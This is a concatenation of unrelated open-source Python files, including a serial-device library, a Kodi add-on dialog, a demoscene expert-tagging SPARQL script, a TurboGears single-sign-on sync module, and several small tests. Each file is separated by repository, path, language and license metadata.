ret = self.send(msg, response=msg, timeout=timeout, retry=retry)
self.started = False
return ret
def chdevid(self, new_address, reboot=True, timeout=1, retry=3):
"""Change the device address."""
msg = 'CHDEVID%s' % new_address
ret = self.send(msg, response=msg, timeout=timeout, retry=retry)
if ret is None:
return False
if reboot:
ret = self.reboot()
self.address = new_address
return ret
def panid(self, new_panid, timeout=1, retry=3):
"""Change the device PAN id."""
msg = 'PANID%s' % new_panid
return self.send(msg, response=msg, timeout=timeout, retry=retry)
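# Usage sketch (illustrative; the serial port name and device address 'AA'
# are assumptions):
if __name__ == '__main__':
    trx = Transceiver('/dev/ttyAMA0', 9600, debug=True)
    dev = Device('AA', trx)
    print dev.hello()  # expect 'HELLO' echoed back, or None after retries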
|
piit79/python-llap
|
llap/__init__.py
|
Python
|
gpl-2.0
| 9,687
|
# -*- coding: utf-8 -*-
# Various utilities (toolbox)
def synchronized(lock):
""" Synchronization decorator.
Usage:
import threading
lock = threading.Lock()
@synchronized(lock)
def function():
something synchronous
"""
def wrap(f):
def newFunction(*args, **kw):
with lock:
return f(*args, **kw)
return newFunction
return wrap
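# Runnable sketch (illustrative) of the decorator in use:
if __name__ == '__main__':
    import threading
    lock = threading.Lock()

    @synchronized(lock)
    def critical():
        # runs while holding `lock`
        return threading.current_thread().name

    print(critical())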
|
srlobo/slutils
|
slutils/utils.py
|
Python
|
gpl-2.0
| 441
|
import httplib2, urllib, json, re, os, csv, codecs
expert_results = []
sourcedir = "/Users/oliver/PycharmProjects/parse_comments/output_rev1_sub_windows"
outputdir = "/Users/oliver/PycharmProjects/fetch_expert_status"
outputdir_single = "/Users/oliver/PycharmProjects/fetch_expert_status/expert_single"
outputfile_experts = 'expert_results.csv'
document_i = 1
csv_store = []
while document_i <= 61930:  # change back to 60000 afterwards
try:
inputfile = '%s.csv' % (document_i)
os.chdir(sourcedir)
csvinput = codecs.open(inputfile, 'r', 'latin1')
#num_lines = sum(1 for line in csvinput)
#print(num_lines)
reader = csv.reader(csvinput, delimiter=';')
csv_row_count = 0
for row in reader:
csv_store.append(row)
except:
pass
document_i += 1
#print(len(csv_store))
comment_i = 0
first_iteration = 1
comment_i_indicator = 1
os.chdir(outputdir_single)
while comment_i < len(csv_store):  # change back to 60000 afterwards
try:
#comment_i_indicator = comment_i
expert_candidate = csv_store[comment_i][3]
source_document = csv_store[comment_i][2]
demo_i = csv_store[comment_i][0]
if first_iteration != 1:
if demo_i != demo_i_indicator:
outputfile_experts = '%s_expert.csv' % (demo_i_indicator)
with open(outputfile_experts, 'w', newline='', encoding='latin1') as output_experts:
writer = csv.writer(output_experts, delimiter=';')
writer.writerows(expert_results)
comment_i_indicator = 1
expert_results = []
first_iteration = 0
demo_i_indicator = demo_i
#expert_candidate = 'jb'
        for ch in (' ', '\\', '|', '#', '"', '^', '<', '>',
                   '{', '}', '[', ']', '%', '`', '�'):
            expert_candidate = expert_candidate.replace(ch, '_')
        expert_candidate = expert_candidate.lower()
source_document = source_document.lower()
query = 'PREFIX :<http://www.w3.org/2002/07/owl#> PREFIX rdfs:<http://www.w3.org/2000/01/rdf-schema#> PREFIX ns:<http://purl.org/marl/ns#> PREFIX psys:<http://proton.semanticweb.org/protonsys#> PREFIX erlangen-crm:<http://erlangen-crm.org/120111/> PREFIX owl:<http://www.w3.org/2002/07/owl#> PREFIX xsd:<http://www.w3.org/2001/XMLSchema#> PREFIX rdf:<http://www.w3.org/1999/02/22-rdf-syntax-ns#> PREFIX pext:<http://proton.semanticweb.org/protonext#> PREFIX demoage:<http://www.m-e-g-a.org/ontologies/demoage#> SELECT DISTINCT ?expert_evidence WHERE {demoage:%s rdf:type erlangen-crm:E21_Person . demoage:%s erlangen-crm:P11i_participated_in ?x . ?x rdf:type erlangen-crm:E65_Creation . ?x erlangen-crm:P14_carried_out_by demoage:%s . ?x erlangen-crm:P2_has_type ?y. ?y erlangen-crm:P3_has_note ?expert_evidence }' % (expert_candidate, expert_candidate, expert_candidate)
repository = 'demoage'
endpoint = 'http://localhost:8080/openrdf-sesame/repositories/%s' % (repository)
print("POSTing SPARQL query")
params = { 'query': query}
headers = {
'content-type': 'application/x-www-form-urlencoded',
'accept': 'application/sparql-results+json'
}
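        # The endpoint answers in the SPARQL JSON results format; the parsing
        # below expects a shape like (value hypothetical):
        #   {"results": {"bindings": [
        #       {"expert_evidence": {"value": "graphics creation"}}]}}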
(response, content) = httplib2.Http().request(endpoint, 'POST', urllib.parse.urlencode(params), headers=headers)
print("Sesame Response", response.status)
content = content.decode('utf-8')
#print(content)
#print(type(content))
try:
results = json.loads(content)
except:
pass
#print(results)
i = 0
expert_dict = []
while i <= 6:
expertstring = ''
try:
expertstring = results['results']['bindings'][i]['expert_evidence']['value']
except:
pass
expert_dict.append(str(expertstring))
i += 1
#print(expertstring)
#expert_match = re.search(r'_creation', expertstring)
#if expert_match:
# expert_value = 'expert'
#else:
# expert_value = ''
print_i = 0
while print_i <= i-1:
#print(expert_dict[print_i])
print_i += 1
# extracting the types of participation and setting the lookup tables which are to be used
use_lookup_table_graphics = 0 # default values
use_lookup_table_music = 0
use_lookup_table_tool = 0
use_lookup_table_texture = 0
use_lookup_table_engine = 0
use_lookup_table_code = 0
use_lookup_table_general = 0
aspect_select_i = 0
while aspect_select_i <= print_i-1:
if expert_dict[aspect_select_i] == 'graphics creation':
use_lookup_table_graphics = 1
if expert_dict[aspect_select_i] == 'music creation':
use_lookup_table_music = 1
if expert_dict[aspect_select_i] == 'tool creation':
use_lookup_table_tool = 1
if expert_dict[aspect_select_i] == 'texturing creation':
use_lookup_table_texture = 1
if expert_dict[aspect_select_i] == 'engine creation':
use_lookup_table_engine = 1
if expert_dict[aspect_select_i] == 'code creation':
use_lookup_table_code = 1
if expert_dict[aspect_select_i] == 'demosceneart production creation':
use_lookup_table_general = 1
aspect_select_i += 1
#*** defining the lookup tables for the aspects (defined unconditionally here;
# the use_lookup_table_* flags still decide which tables are applied below)
lookup_table_graphics_aspects = ['effects', 'gfx', 'visuals', 'visual', 'graphics', '3d', 'animation', 'interface', 'rendering', '2d', 'graphic', 'models', 'particles', 'sprites', 'design', 'effect', 'colors', 'colours', 'color', 'scenes', 'fonts', 'fx', 'objects', 'camera', 'menu', 'raytracing', 'pictures', 'transitions', 'presentation', 'vector']
lookup_table_music_aspects = ['music', 'sound', 'audio', 'soundtrack', 'song', 'synth', 'musics', 'tune', 'tunes', 'sounds', 'mod', 'bass']
lookup_table_tool_aspects = []
lookup_table_texture_aspects = ['textures', 'texture']
lookup_table_engine_aspects = ['engine', 'speed']
lookup_table_code_aspects = ['code', 'filesize', 'coding', 'size', 'coded']
lookup_table_general_aspects = ['production', 'demo', 'prod', 'result', 'execution', 'in general', 'executed', 'intro', 'intros', 'concept', 'piece', 'direction', 'theme']
# *** matching the comment content against the ontology info via the lookup tables
#source_document = 'The gfx on this prod are rly n1. Also the soundtrack and the filesize are impressive.'
matching_document_aspects = ''
aspect_tables = [
    ('graphics', use_lookup_table_graphics, lookup_table_graphics_aspects),
    ('music', use_lookup_table_music, lookup_table_music_aspects),
    ('tool', use_lookup_table_tool, lookup_table_tool_aspects),
    ('texture', use_lookup_table_texture, lookup_table_texture_aspects),
    ('engine', use_lookup_table_engine, lookup_table_engine_aspects),
    ('code', use_lookup_table_code, lookup_table_code_aspects),
    ('general', use_lookup_table_general, lookup_table_general_aspects),
]
for aspect_label, use_flag, lookup_table in aspect_tables:
    if use_flag != 1:
        continue
    for aspect_string in lookup_table:
        if re.search(aspect_string, source_document):
            #print(aspect_label, 'match: ', aspect_string)
            matching_document_aspects += aspect_label + ','
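# Note: re.search does plain substring matching above, so 'size' also fires
# inside 'filesize' and 'color' inside 'colors'. A stricter variant (an
# assumption, not what this script does) would anchor on word boundaries:
#
#   if re.search(r'\b%s\b' % re.escape(aspect_string), source_document):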
expert_single = [demo_i, comment_i_indicator, expert_candidate, matching_document_aspects]
# save expert_single as a pickle, filename: %s_%s_expert
#doc_output = '%s_%s_expert.csv' % (str(demo_i), str(comment_i_indicator))
#with open(doc_output, 'w', newline='', encoding='latin1') as output_single_expert:
"""with open(doc_output, 'w', encoding='latin1') as output_single_expert:
writer_single = csv.writer(output_single_expert, delimiter=';')
writer_single.writerows(str(expert_single[3]))"""
expert_results.append(expert_single)
#for item in matching_document_aspects: # aspects in which the author's opinion should be given increased weight
# print(item)
#print(expert_results)
print(expert_single)
comment_i_indicator += 1
except Exception:
    # skip comments that fail anywhere in the pipeline above
    #print('error:', comment_i)
    pass
comment_i += 1
#os.chdir(outputdir)
#with open(outputfile_experts, 'w', newline='', #encoding='latin1') as output_experts:
# writer = csv.writer(output_experts, delimiter=';')
# writer.writerows(expert_results)
|
olivergoetze/demoscene-sentiment-classifier
|
fetch_experts_status/fetch_from_ontology.py
|
Python
|
gpl-2.0
| 10,972
|
# -*- coding: utf-8 -*-
import pyxbmct
import xbmcaddon
import xbmc
import xbmcgui
from random import choice
from sport365 import getUrl as mod
ADDON = xbmcaddon.Addon()
FANART = ADDON.getAddonInfo('fanart')
ICON = ADDON.getAddonInfo('icon')
NAME = ADDON.getAddonInfo('name')
dialog = xbmcgui.Dialog()
class Prompt(pyxbmct.AddonDialogWindow):
def __init__(self):
# noinspection PyArgumentList
super(Prompt, self).__init__('Sports365 News - Updates - Help')
self.changelog_button = None
self.disclaimer_button = None
self.close_button = None
self.external_label = None
self.description = None
self.donation_button = None
self.debrid_button = None
self.facebook_button = None
self.twitter_button = None
self.tele_button = None
self.github_button = None
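# 854x480 pixel window laid out on an 8-row by 5-column pyxbmct grid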
self.setGeometry(854, 480, 8, 5)
self.set_controls()
self.connect(pyxbmct.ACTION_NAV_BACK, self.close)
self.set_navigation()
def set_controls(self):
image = pyxbmct.Image(FANART, aspectRatio=2)
self.placeControl(image, 0, 0, 5, 5)
# Note
self.description = pyxbmct.Label('Developer: Bugatsinho', alignment=2)
self.placeControl(self.description, 5, 0, 2, 5)
# Telegram Button
self.tele_button = pyxbmct.Button('[COLOR gold]Telegram Link[/COLOR]')
self.placeControl(self.tele_button, 6, 0, 1, 1)
self.connect(self.tele_button, lambda: open_web_browser('http://bit.ly/bug_telegram'))
# Paypal button
self.debrid_button = pyxbmct.Button('[COLOR gold]RDebrid Link[/COLOR]')
self.placeControl(self.debrid_button, 6, 1, 1, 1)
self.connect(self.debrid_button, lambda: open_web_browser('http://bit.ly/RDedlink'))
# Donation button
self.donation_button = pyxbmct.Button('[COLOR gold]Donation Link[/COLOR]')
self.placeControl(self.donation_button, 6, 2, 1, 1)
self.connect(self.donation_button, lambda: open_web_browser('https://pastebin.com/raw/9J1KGKsj'))
# Twitter button
self.twitter_button = pyxbmct.Button('[COLOR gold]Twitter Link[/COLOR]')
self.placeControl(self.twitter_button, 6, 3, 1, 1)
self.connect(self.twitter_button, lambda: open_web_browser('https://twitter.com/bugatsinho'))
# GitHub button
self.github_button = pyxbmct.Button('[COLOR gold]GitHub Link[/COLOR]')
self.placeControl(self.github_button, 6, 4, 1, 1)
self.connect(self.github_button, lambda: open_web_browser('https://github.com/bugatsinho/bugatsinho.github.io/tree/master/plugin.video.sport365.live'))
# Close button
self.close_button = pyxbmct.Button('[COLOR gold]CLOSE[/COLOR]')
self.placeControl(self.close_button, 7, 2)
self.connect(self.close_button, self.close)
# Changelog button
self.changelog_button = pyxbmct.Button('[COLOR gold]NEWS & UPDATES[/COLOR]')
self.placeControl(self.changelog_button, 7, 0, 1, 2)
self.connect(self.changelog_button, lambda: news())#https://pastebin.com/raw/mpgxNy2V
# Disclaimer button
self.disclaimer_button = pyxbmct.Button('[COLOR gold]DISCLAIMER[/COLOR]')
self.placeControl(self.disclaimer_button, 7, 3, 1, 2)
self.connect(self.disclaimer_button, lambda: disclaimer())
def set_navigation(self):
self.tele_button.controlRight(self.debrid_button)
self.tele_button.controlDown(self.changelog_button)
self.donation_button.controlRight(self.twitter_button)
self.donation_button.controlDown(self.close_button)
self.donation_button.controlLeft(self.debrid_button)
self.debrid_button.controlLeft(self.tele_button)
self.debrid_button.controlDown(self.close_button)
self.debrid_button.controlRight(self.donation_button)
self.github_button.controlDown(self.disclaimer_button)
self.github_button.controlLeft(self.twitter_button)
self.twitter_button.controlLeft(self.donation_button)
self.twitter_button.controlDown(self.disclaimer_button)
self.twitter_button.controlRight(self.github_button)
self.close_button.controlLeft(self.changelog_button)
self.close_button.controlRight(self.disclaimer_button)
self.close_button.controlUp(self.donation_button)
self.changelog_button.controlRight(self.close_button)
self.changelog_button.controlUp(self.tele_button)
self.disclaimer_button.controlLeft(self.close_button)
self.disclaimer_button.controlUp(choice([self.github_button, self.twitter_button]))  # up-target picked at random between the two buttons above it
self.setFocus(self.close_button)
def welcome():
window = Prompt()
window.doModal()
del window
def disclaimer():
try:
text = xbmcaddon.Addon().getAddonInfo('disclaimer').decode('utf-8')
except (UnicodeEncodeError, UnicodeDecodeError, AttributeError):
text = xbmcaddon.Addon().getAddonInfo('disclaimer')
dialog.textviewer('Sports365' + ' ' + 'Disclaimer', text)
def news():
_news = mod('https://pastebin.com/raw/pf1Mkg73')
dialog.textviewer('Sports365' + ' ' + 'News & Updates', _news.encode('utf-8'))
def android_activity(url, package=''):
if package:
package = '"' + package + '"'
return xbmc.executebuiltin('StartAndroidActivity({0},"android.intent.action.VIEW","","{1}")'.format(package, url))
def open_web_browser(url):
if xbmc.getCondVisibility('system.platform.android'):
return android_activity(url)
else:
import webbrowser
return webbrowser.open(url)
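# Usage sketch: open_web_browser('https://example.com') routes through
# StartAndroidActivity on Android and the stdlib webbrowser module elsewhere.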
|
repotvsupertuga/tvsupertuga.repository
|
plugin.video.sport365.live/newsbox.py
|
Python
|
gpl-2.0
| 5,581
|
import logging
import time
import turbogears.config
import hubspace.config
from turbogears.identity.soprovider import SqlObjectIdentityProvider
import thread
import threading
import base64
import sendmail
try:
SYNC_ENABLED = turbogears.config.config.configs['syncer']['sync']
except Exception, err:
print err
SYNC_ENABLED = False
tls = threading.local()
applogger = logging.getLogger("hubspace")
SSOIdentityProvider = SqlObjectIdentityProvider
_cp_filters = []
def setupSync(): pass
def sendRollbackSignal(): pass
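# The two stubs above are no-op defaults; when SYNC_ENABLED is true they are
# replaced by the real implementations defined in the block below.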
class SyncerError(Exception):
    """
    Raised when a syncer transaction fails.
    """
if SYNC_ENABLED:
import syncer
import syncer.client
import syncer.config
import syncer.utils
import syncer.helpers
import syncer.helpers.ldap
import cherrypy
from cherrypy.filters.basefilter import BaseFilter
import hubspace.model as model
syncer.config.host = turbogears.config.config.configs['syncer']['syncer_host']
syncer.config.port = turbogears.config.config.configs['syncer']['syncer_port']
syncer.config.__syncerdebug__ = True
syncer.config.reload()
_sessions = dict()
sessiongetter = lambda: _sessions
syncerclient = syncer.client.SyncerClient("hubspace", sessiongetter)
fail_on_syncerror = False
class LazyCall(object):
def __init__(self, f):
self.f = f
def __call__(self, *args, **kw):
self.args = args
self.kw = kw
def run(self):
return self.f(*self.args, **self.kw)
class LazySyncerClient(list):
def __init__(self, client):
self._client = client
def __getattr__(self, name):
lazy_call = LazyCall(getattr(self._client, name))
self.append(lazy_call)
return lazy_call
def run_all(self):
self.results = [x.run() for x in self]
return self.results
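# LazySyncerClient records every attribute access as a deferred call instead
# of executing it; TransactionCompleter.on_end_resource() replays them via
# run_all() once the request has finished.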
class SSOIdentityProvider(SqlObjectIdentityProvider):
def validate_identity(self, user_name, password, visit_key):
iden = super(SSOIdentityProvider, self).validate_identity(user_name, password, visit_key)
applogger = logging.getLogger("hubspace")
if iden and not syncerclient.isSyncerRequest(cherrypy.request.headers.get("user-agent", None)):
cookies = syncer.utils.convertCookie(cherrypy.request.simple_cookie)
try:
ret = syncerclient.onUserLogin(user_name, password, cookies)
t_id, res = ret
except ValueError:
print ret
# a warning here
return iden
except Exception, err:
print err
# a warning here
return iden
if not syncerclient.isSuccessful(res):
print syncer.client.errors.res2errstr(res)
else:
for v in res.values():
try:
sso_cookies = v['result']
c = syncer.utils.convertCookie(sso_cookies)
cherrypy.response.simple_cookie.update(c)
except:
print "skipping ", v['appname']
# help issue reporter
try:
user = iden.user
uinfo = "|".join((user.first_name, user.last_name, user.homeplace.name, user.email_address))
cherrypy.response.simple_cookie['uinfo'] = base64.b64encode(uinfo)
cherrypy.response.simple_cookie['uinfo']['domain'] = turbogears.config.config.configs['global']['session_filter.cookie_domain']
except Exception, err:
# dont stop on any error
print err
return iden
# http://www.cherrypy.org/wiki/UpgradeTo22
class TransactionCompleter(BaseFilter):
def on_start_resource(self, *args, **kw):
tls.syncer_trs = []
tls.syncerclient = LazySyncerClient(syncerclient)
def on_end_resource(self, *args, **kw):
tls.syncerclient.run_all()
if hasattr(tls, 'syncer_trs') and tls.syncer_trs:
syncerclient.completeTransactions(tuple(tls.syncer_trs))
_cp_filters.append(TransactionCompleter())
def sendRollbackSignal():
if hasattr(tls, "syncer_trs") and tls.syncer_trs:
to_rollback = tls.syncer_trs
tls.syncer_trs = []
if to_rollback:
syncerclient.rollbackTransactions(tuple(reversed(to_rollback)))
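# Transactions are rolled back in reverse order, presumably so that dependent
# syncer operations unwind before the ones they build on.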
def signon():
u = turbogears.config.config.configs['syncer']['hubspaceadminuid']
p = turbogears.config.config.configs['syncer']['hubspaceadminpass']
applogger.info("syncer: signon begin: %s" % u)
ret = syncerclient.onSignon(u, p)
tr_id, res = ret
if syncerclient.isSuccessful(res):
    syncerclient.setSyncerToken(res['sessionkeeper']['result'])
    msg = "syncer: signon successful: %s" % u
    applogger.info(msg)
    print msg
    return True
msg = "Syncer signon failed: %s" % res
applogger.warn(msg)
print msg
msg = syncer.client.errors.res2errstr(res)
applogger.warn(msg)
print msg
def signonloop():
print "this is the signonloop"
while not signon():
time.sleep(7)
## All sync operations ##
from sqlobject.events import listen, RowUpdateSignal, RowCreatedSignal, RowDestroySignal
def checkSyncerResults(f):
def wrap(*args, **kw):
ret = f(*args, **kw)
f_name = getattr(f, '__name__', str(f))
applogger.debug("syncer: %s-> %s" % (f_name, ret))
if ret:
t_id, res = ret
if res and not syncerclient.isSuccessful(res):
if fail_on_syncerror:
raise SyncerError("syncer backend error")
return
if t_id > 0:
tls.syncer_trs.append(t_id)
print "syncer_trs.append", t_id
return ret
return wrap
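# checkSyncerResults inspects each listener's (transaction id, result) pair:
# failures optionally abort the request via SyncerError, and successful
# transaction ids are queued on the thread-local list that
# TransactionCompleter completes at the end of the request.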
def checkReqHeaders(f):
def wrap(*args, **kw):
try:
if not syncerclient.isSyncerRequest(cherrypy.request.headers.get("user-agent", None)):
return f(*args, **kw)
except AttributeError:
# outside CheeryPy request which is fine
return f(*args, **kw)
return wrap
@checkReqHeaders
@checkSyncerResults
def usr_add_listener(kwargs, post_funcs):
instance = kwargs['class'].get(kwargs['id'])
return tls.syncerclient.onUserAdd(instance.id)
@checkSyncerResults
@checkReqHeaders
def usr_updt_listener(instance, kwargs):
if instance.user_name == turbogears.config.config.configs['syncer']['hubspaceadminuid']:
return
#if 'password' in kwargs and kwargs.get('password') != instance.password:
# return tls.syncer.onUserPasswordMod(kw['password'])
return tls.syncerclient.onUserMod(instance.id)
@checkSyncerResults
@checkReqHeaders
def group_join_listener(kwargs, post_funcs):
instance = kwargs['class'].get(kwargs['id'])
return tls.syncerclient.onGroupJoin(instance.user.id, instance.group.id)
@checkSyncerResults
@checkReqHeaders
def group_leave_listener(instance, post_funcs):
return tls.syncerclient.onGroupLeave(instance.user.id, instance.group.id)
def setupSync():
    # In some situations it's not desirable to have sync on right from server
    # boot; e.g. in new setups we may want to create the initial users before
    # we start syncing.
    print "setup: Enabling sync"
listen(usr_add_listener, model.User, RowCreatedSignal)
listen(usr_updt_listener, model.User, RowUpdateSignal)
listen(group_join_listener, model.UserGroup, RowCreatedSignal)
listen(group_leave_listener, model.UserGroup, RowDestroySignal)
thread.start_new(signonloop, ()) # with ldap disable this is required
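# The listen() calls above hook SQLObject row signals so that user and group
# changes in hubspace are mirrored to the syncer as lazy, per-request calls.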
# @checkSyncerResults
# @checkReqHeaders
# def usr_updt_listener(instance, kwargs):
# if instance.user_name == turbogears.config.config.configs['syncer']['hubspaceadminuid']: return
# kw = dict ([(k, v) for (k,v) in kwargs.items() if getattr(instance, k) != v])
# if kw:
# mod_list = syncer.helpers.ldap.object_maps['user'].toLDAP(instance, kw)
# if mod_list:
# return syncerclient.onUserMod(instance.user_name, mod_list)
#
# @checkSyncerResults
# @checkReqHeaders
# def hub_updt_listener(instance, kwargs):
# kw = dict ([(k, v) for (k,v) in kwargs.items() if getattr(instance, k) != v])
# mod_list = syncer.helpers.ldap.object_maps['hub'].toLDAP(instance, kw)
# if mod_list:
# return syncerclient.onHubMod(instance.id, mod_list)
#
# @checkReqHeaders
# @checkSyncerResults
# def usr_add_listener(kwargs, post_funcs):
# instance = kwargs['class'].get(kwargs['id'])
# mod_list = syncer.helpers.ldap.object_maps['user'].toLDAP(instance)
# return syncerclient.onUserAdd(instance.user_name, mod_list)
#
# @checkReqHeaders
# @checkSyncerResults
# def hub_add_listener(kwargs, post_funcs):
# instance = kwargs['class'].get(kwargs['id'])
# mod_list = syncer.helpers.ldap.object_maps['hub'].toLDAP(instance, {})
# return syncerclient.onHubAdd(instance.id, mod_list)
#
# @checkReqHeaders
# @checkSyncerResults
# def grp_add_listener(kwargs, post_funcs):
# instance = kwargs['class'].get(kwargs['id'])
# mod_list = syncer.helpers.ldap.object_maps['role'].toLDAP(instance, {})
# return syncerclient.onRoleAdd(instance.place.id, instance.level, mod_list)
#
# @checkReqHeaders
# @checkSyncerResults
# def grp_updt_listener(instance, kwargs):
# mod_list = syncer.helpers.ldap.object_maps['group'].toLDAP(instance, kwargs)
# return syncerclient.onGroupMod(kwargs['group_name'], mod_list)
#
# @checkReqHeaders
# @checkSyncerResults
# def accesspolicy_add_listener(kwargs, post_funcs):
# instance = kwargs['class'].get(kwargs['id'])
# mod_list = syncer.helpers.ldap.object_maps['policy'].toLDAP(instance, {})
# return syncerclient.onAccesspolicyAdd(instance.location.id, mod_list)
#
# @checkReqHeaders
# @checkSyncerResults
# def accesspolicy_updt_listener(instance, kwargs):
# mod_list = syncer.helpers.ldap.object_maps['policy'].toLDAP(instance, kwargs)
# return syncerclient.onAccesspolicyMod(instance.id, instance.location.id, mod_list)
#
# @checkReqHeaders
# @checkSyncerResults
# def accesspolicy_del_listener(instance, post_funcs):
# return syncerclient.onAccesspolicyDel(instance.id, instance.location.id)
#
# @checkReqHeaders
# @checkSyncerResults
# def opentimes_add_listener(kwargs, post_funcs):
# instance = kwargs['class'].get(kwargs['id'])
# mod_list = syncer.helpers.ldap.object_maps['opentimes'].toLDAP(instance, {})
# return syncerclient.onOpentimesAdd(instance.policy.id, instance.policy.location.id, mod_list)
#
# @checkReqHeaders
# @checkSyncerResults
# def opentimes_updt_listener(instance, kwargs):
# mod_list = syncer.helpers.ldap.object_maps['opentimes'].toLDAP(instance, kwargs)
# return syncerclient.onOpentimesMod(instance.id, instance.policy.id, instance.policy.location.id, mod_list)
#
# @checkReqHeaders
# @checkSyncerResults
# def opentimes_del_listener(instance, post_funcs):
# return syncerclient.onOpentimesDel(instance.id, instance.policy.id, instance.policy.location.id)
#
# #@checkSyncerResults
# def tariff_listener(kwargs, post_funcs):
# instance = kwargs['class'].get(kwargs['id'])
# if instance.resource.type != 'tariff':
# return
# tariff_id = instance.resource.id
# place_id = instance.resource.place.id
# username = instance.user.user_name
# mod_list = syncer.helpers.ldap.object_maps['user'].toLDAP(None, dict(tariff_id = tariff_id, hubId = place_id))
# t_id, res = syncerclient.onUserMod(username, mod_list)
# if not syncerclient.isSuccessful(res):
# body = """
# LDAP Error: Setting Tariff for user %(username)s has failed.
# Below is the data sent to syncer for the modification:
# Hub id: %(place_id)s
# Change data: %(mod_list)s
# """ % locals()
# sendmail.sendmail(to="world.tech.space@the-hub.net", sender="noreply@the-hub.net", \
# cc="shekhar.tiwatne@the-hub.net", subject="LDAP Error report", body=body)
# return t_id, res
#
# @checkReqHeaders
# @checkSyncerResults
# def add_user2grp_listener(kwargs, post_funcs):
# instance = kwargs['class'].get(kwargs['id'])
# if instance.group.place:
# onAssignRoles = checkSyncerResults(syncerclient.onAssignRoles)
# onAssignRoles(instance.user.user_name, instance.group.place.id, instance.group.level)
# if instance.group.group_name == "superuser":
# mod_list = syncer.helpers.ldap.object_maps['group'].toLDAP(instance)
# return syncerclient.onGroupMod("superusers", mod_list) # <- it's superusers at ldap
#
# @checkReqHeaders
# @checkSyncerResults
# def tariff_add_listener(kwargs, post_funcs):
# instance = kwargs['class'].get(kwargs['id'])
# mod_list = syncer.helpers.ldap.object_maps['tariff'].toLDAP(instance)
# return syncerclient.onTariffAdd(instance.place.id, mod_list)
#
# ## /sync operations
#
# def setupLDAPSync():
# # in some situations it's not desired to have sync on right from the server boot. Like in new setups we may want
# # to create initial users before we start syncing.
# print "setup: Enabling LDAP sync"
# listen(usr_add_listener, model.User, RowCreatedSignal)
# listen(usr_updt_listener, model.User, RowUpdateSignal)
# listen(hub_add_listener, model.Location, RowCreatedSignal)
# listen(hub_updt_listener, model.Location, RowUpdateSignal)
# listen(grp_add_listener, model.Group, RowCreatedSignal)
# listen(grp_updt_listener, model.Group, RowUpdateSignal)
# listen(add_user2grp_listener, model.UserGroup, RowCreatedSignal)
# listen(accesspolicy_updt_listener, model.AccessPolicy, RowUpdateSignal)
# listen(accesspolicy_add_listener, model.AccessPolicy, RowCreatedSignal)
# listen(accesspolicy_del_listener, model.AccessPolicy, RowDestroySignal)
# listen(opentimes_add_listener, model.Open, RowCreatedSignal)
# listen(opentimes_updt_listener, model.Open, RowUpdateSignal)
# listen(opentimes_del_listener, model.Open, RowDestroySignal)
# listen(tariff_listener, model.RUsage, RowCreatedSignal)
# listen(tariff_add_listener, model.Resource, RowCreatedSignal)
#
# thread.start_new(signonloop, ())
|
thehub/hubspace
|
hubspace/sync/core.py
|
Python
|
gpl-2.0
| 15,261
|
#!/usr/bin/env python
#=========================================================================
# This is OPEN SOURCE SOFTWARE governed by the Gnu General Public
# License (GPL) version 3, as described at www.opensource.org.
# Copyright (C)2016 William H. Majoros (martiandna@gmail.com).
#=========================================================================
from __future__ import (absolute_import, division, print_function,
unicode_literals, generators, nested_scopes, with_statement)
from builtins import (bytes, dict, int, list, object, range, str, ascii,
chr, hex, input, next, oct, open, pow, round, super, filter, map, zip)
# The above imports should allow this program to run in both Python 2 and
# Python 3. You might need to update your version of module "future".
import sys
import os
import math
import ProgramName
from Pipe import Pipe
from FastaReader import FastaReader
MUMMIE=os.environ["MUMMIE"]
if(len(sys.argv)!=4):
exit(ProgramName.get()+" <rescaled-scores.txt> <shendure-scores.txt> <fastb-dir>\n")
(rescaledFile,shendureFile,fastbDir)=sys.argv[1:]
def arithmeticMean(seq,hexHash):
L=len(seq)
end=L-5
sum=0.0
for i in range(end):
hex=seq[i:i+6]
hexScore=hexHash[hex]
sum+=hexScore
mean=float(sum)/float(end)
return mean
def product(seq,hexHash):
L=len(seq)
end=L-5
product=1.0
for i in range(end):
hex=seq[i:i+6]
hexScore=hexHash[hex]
product*=hexScore
product=product**(1.0/float(end))
return product
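# Despite its name, product() returns the geometric mean: the (L-5)-th root of
# the product of all hexamer scores, which keeps long sequences comparable to
# the arithmetic mean above.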
shendureHash={}
with open(shendureFile,"rt") as IN:
for line in IN:
fields=line.rstrip().split()
if(len(fields)!=2): continue
(hex,score)=fields
shendureHash[hex]=float(score)
#print(hex,float(score))
rescaledHash={}
with open(rescaledFile,"rt") as IN:
for line in IN:
fields=line.rstrip().split()
if(len(fields)!=2): continue
(hex,score)=fields
rescaledHash[hex]=float(score)
#print(hex,math.log(float(score)))
files=os.listdir(fastbDir)
for file in files:
(defline,seq)=FastaReader.firstSequence(fastbDir+"/"+file)
length=len(seq)
if(length<6): continue
shendureScore=arithmeticMean(seq,shendureHash)
rescaledScore=product(seq,rescaledHash)
print(shendureScore,rescaledScore,sep="\t")
|
ReddyLab/1000Genomes
|
compare-hex-scores-LR.py
|
Python
|
gpl-2.0
| 2,341
|
#!/usr/bin/env python
import unittest
from pykeg.core import keg_sizes
class KegSizesTest(unittest.TestCase):
def test_match(self):
match = keg_sizes.find_closest_keg_size
self.assertEqual("other", match(100.0))
self.assertEqual("other", match(100000000.0))
self.assertEqual("sixth", match(19570.6))
self.assertEqual("sixth", match(19470.6))
self.assertEqual("other", match(19460.6))
if __name__ == "__main__":
unittest.main()
|
Kegbot/kegbot-server
|
pykeg/core/keg_sizes_test.py
|
Python
|
gpl-2.0
| 488
|
#! /usr/bin/python2
import os
import MySQLdb
class MySQL_conn:
def __init__(self, hostname, database, username, password):
self.connect = MySQLdb.connect(host = hostname,
db = database,
user = username,
passwd = password)
self.cursor = self.connect.cursor()
def connection(self):
return self.connect
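# Usage sketch (hypothetical credentials):
#   db = MySQL_conn('localhost', 'sequencing', 'pipeline_user', 'secret')
#   db.cursor.execute('SELECT VERSION()')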
|
avoorhis/mbl_sequencing_pipeline
|
pipeline/mysql_conn.py
|
Python
|
gpl-2.0
| 462
|
"""API docs tests."""
from django.test import TestCase
from rest_framework import status
class APIDocsTest(TestCase):
"""Test the access to the API docs."""
def test_docs_url(self):
response = self.client.get('/api/docs/')
self.assertEqual(response.status_code, status.HTTP_200_OK)
|
oser-cs/oser-website
|
tests/test_docs.py
|
Python
|
gpl-3.0
| 309
|
from ovito import *
import sys
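# Exits with a deliberate nonzero status; the test suite presumably asserts
# that SystemExit raised from a script propagates to the host process.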
sys.exit(2)
|
srinath-chakravarthy/ovito
|
tests/scripts/test_suite/system_exit.py
|
Python
|
gpl-3.0
| 43
|
#!/usr/bin/env python
# _*_ coding:utf-8 _*-_
############################
# File Name: webFrame.py
# Author: lza
# Created Time: 2016-10-24 15:42:40
############################
